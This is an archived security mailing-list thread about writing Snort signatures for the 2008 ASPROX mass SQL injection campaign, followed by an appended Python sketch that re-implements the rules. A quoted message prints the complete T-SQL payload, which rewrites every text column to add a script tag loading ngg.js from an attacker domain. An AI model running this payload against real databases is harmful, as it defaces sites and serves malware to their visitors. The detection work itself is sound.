[Emerging-Sigs] Another ASPROX Snort rule
Rodrigo Montoro(Sp0oKeR)
spooker at gmail.com
Mon Jul 7 12:49:16 EDT 2008
I think this javascript changes every time. I will probably try something to
get the attack ( http://isc.sans.org/diary.html?storyid=3823 ):
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Possible Mass SQL
Injection Detected";uricontent:"declare";nocase; uricontent: "varchar";
nocase;pcre:"/declare.+varchar.+exec/i";classtype:attempted-admin;
reference:url,http://isc.sans.org/diary.html?storyid=3823;sid:3000000;
rev:1;)
Just a simple suggestion of a rule. Maybe we could make some changes.
Regards,
On Mon, Jul 7, 2008 at 1:30 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> Thanks Greg. I think this url is safer to sig than the old /b.js.
> Posting your sig now.
>
> Matt
>
> Greg Martin wrote:
> > ASPROX payload morphed
> >
> > New domains found and new javascript payload "ngg.js" replaced the
> > previous "b.js" starting just a couple of days ago. And it doesn't
> > seem to be wasting any time:
> > http://www.google.com/search?q=ngg.js Results 1 - 10 of about
> > 19,300 for ngg.js. (0.03 seconds)
> >
> > DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR
> > FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE
> > a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231
> > OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
> > @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C
> > +']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=
> > http://www.apidad.com/ngg.js></script>''') FETCH NEXT FROM Table_Cursor
> > INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
> >
> > Snort signature to detect access of infected site:
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX
> > Infected Site - ngg.js Request"; flow:established,to_server;
> > uricontent:"/ngg.js"; classtype:trojan-activity;
> > reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)
> >
> > -G
> >
> > Greg Martin
> > Director InfoSecurity
> > Econet Inc. - Sentinel IPS
> > 972.991.5005 x102
> > http://infosec20.blogspot.com
> >
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
--
===========================
Rodrigo Montoro (Sp0oKeR)
Security Analyst
SnortCP / RHCE / LPIC-I / MCSO
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================
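As an added example (not part of this thread or of either poster's rules), the following Python sketch re-implements what the two signatures above match: Rodrigo's inbound "declare ... varchar ... exec" URI check and Greg's outbound "/ngg.js" request check. It is run over constructed sample request URIs, not captured traffic; the URI normalisation (percent-decoding, as Snort does before uricontent matching) and the third sample, a benign search query that still fires the loose pcre, are my assumptions and illustrate why the pcre may want tightening before deployment.

```python
"""Toy re-implementation of the two Snort checks from this thread (added example,
not code from the thread): the inbound declare/varchar/exec URI check and the
outbound /ngg.js request check, applied to constructed sample requests."""
import re
from urllib.parse import unquote_plus

# Same expression Rodrigo's rule uses, applied to the normalised URI.
MASS_SQLI_RE = re.compile(r"declare.+varchar.+exec", re.IGNORECASE | re.DOTALL)


def normalize_uri(uri: str) -> str:
    """Approximate Snort's URI normalisation (assumption): decode %xx and '+'
    twice so a double-encoded payload does not slip past the content matches."""
    return unquote_plus(unquote_plus(uri))


def inbound_mass_sqli(uri: str) -> bool:
    """Rodrigo's rule: inbound URI carrying declare, varchar and exec in order,
    the shape of the payload Greg quoted. Case-insensitive like nocase/i."""
    norm = normalize_uri(uri).lower()
    # uricontent:"declare"; uricontent:"varchar"; both nocase
    if "declare" not in norm or "varchar" not in norm:
        return False
    return MASS_SQLI_RE.search(norm) is not None


def outbound_ngg_js(uri: str) -> bool:
    """Greg's rule: outbound request for /ngg.js from an already-injected page."""
    return "/ngg.js" in normalize_uri(uri).lower()


# Constructed sample requests as (direction, URI); none of this is captured data.
SAMPLE_REQUESTS = [
    ("in", "/products.asp?id=12"),
    ("in", "/products.asp?id=12;DECLARE%20@T%20VARCHAR(255)%2C@C%20VARCHAR(255)"
           "%3BEXEC('UPDATE%20x%20SET%20y%3D1')--"),
    # Benign query text that still satisfies declare.+varchar.+exec: a false positive.
    ("in", "/search.asp?q=declare+the+varchar+exec+keyword+tutorial"),
    ("out", "/ngg.js"),
    ("out", "/js/jquery.js"),
]


def classify(requests):
    """Return (direction, uri, msg) for every request that would raise an alert."""
    alerts = []
    for direction, uri in requests:
        if direction == "in" and inbound_mass_sqli(uri):
            alerts.append((direction, uri, "Possible Mass SQL Injection Detected"))
        elif direction == "out" and outbound_ngg_js(uri):
            alerts.append((direction, uri, "ASPROX Infected Site - ngg.js Request"))
    return alerts


if __name__ == "__main__":
    for direction, uri, msg in classify(SAMPLE_REQUESTS):
        print(f"[{direction}] {msg}: {uri[:70]}")
```

Running it fires on the encoded injection, on the benign search query and on the /ngg.js request, while the plain product lookup and the jquery.js fetch stay quiet; the middle hit is the one to keep in mind when tuning the pcre.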